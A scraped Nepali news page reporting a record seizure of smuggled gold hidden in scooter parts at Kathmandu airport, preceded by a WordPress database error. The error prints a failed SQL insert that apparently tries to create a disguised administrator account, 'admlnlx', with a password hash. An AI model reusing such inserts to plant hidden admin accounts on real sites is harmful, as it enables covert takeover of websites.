WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7SI0NeYJRwwLsjmJhm5jrcQbHcnxg.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 11:11:56', '', 'admlnlx', 'admlnlx')
काठमाडौ । त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलबाट आज बुधबार साँझ ठूलो परिमाणमा सुन बरामद भएको छ । राजस्व अनुसन्धान विभागले विमानस्थलको कार्गो गोदाममा छापा मारेर भन्सार छली ल्याइएका सुन बरामद गरेको हो । विभाग तथा प्रहरी स्रोतले विमानस्थलबाट तस्करीको सुन हालसम्मकै ठूलो परिमाण हुने अनुमान गरेको छ ।
विभिन्न उपकरणहरुभित्र राखेर सुन ल्याएको देखिन्छ,’ छापा मार्न संलग्न स्रोतले भन्यो,’भन्सार विमानस्थलको स्क्यानरले समेत पत्ता लाउन नसक्ने गरी भित्र्याइएको देखिन्छ ।’
सुराकीको आधारमा अनुसन्धान विभागले सामान जाँचपास गरेर भन्सार हाताबाट बाहिर ल्याउँदै गरेको अवस्थामा एक भन्सार एजेन्ट र ट्याक्सी चालकसहित सुन बरामद गरेको हो । अनुसन्धान विभागका एक अधिकारीका अनुसार स्कुटरको पार्ट घोषणा गरेर सुनका ल्याएको प्रारम्भिक अनुसन्धानबाट खुलेको छ । स्कुटर पार्टमा सुन पनि जोडेर ल्याएको र त्यसको तौल यकिन हुन सकेको छैन ।